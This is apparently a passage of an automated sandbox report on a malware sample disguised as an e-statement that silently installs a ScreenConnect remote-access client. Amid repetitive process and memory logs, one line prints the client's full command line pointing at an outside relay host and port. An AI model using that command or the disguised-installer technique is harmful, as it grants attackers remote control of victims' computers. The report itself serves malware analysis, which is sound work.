                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 920000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 4930000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 60C0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 58C0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMemory allocated: 1ED0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMemory allocated: 21B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMemory allocated: 1ED0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 1B150000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 1590000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 1B230000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8362.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8567.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exe TID: 7576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe TID: 7984Thread sleep count: 50 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 8132Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe TID: 7324Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: svchost.exe, 00000009.00000002.3446600456.000001470E057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3446015448.0000014708A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3589248928.0000000004710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: 0.0.estatement020134230003.exe.virus.exe.fe63d4.2.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                                  Source: 0.0.estatement020134230003.exe.virus.exe.15178ec.3.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (8d1a70ac1b2b845c)\screenconnect.clientservice.exe" "?e=access&y=guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=bgiaaackaabsu0exaagaaaeaaqdh9vkulel1l4hk6ortvbsb%2bthoksnlk7ue9qyl%2f0hx9d6dat7da%2fwwdsnffail7wzkozkfgefuvzh3db2b%2fnsvw1gbyyru0i1tb65qvaga%2flvqinqa%2fmrlktlesdj%2fbbxbwucr3qlzst6j6zv5%2bj3yerzg2t2x3hg00znlokdhzkrituiilcocfsdx8uo3ntl2k0lkupbjewrhekyioqgccrksxo68%2fpjlrw6iaea%2fbdf3oiyw%2ff5lubvyzuv43lm%2b7jgquatswnq0i7edwlbmxc6aagp4xfbg3zw%2flzs6bdlgcd1ktxwqtigjkldweisoga4awx5bvaiccsnm3ygx&c=genral-lm&c=&c=&c=&c=&c=&c=&c="
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
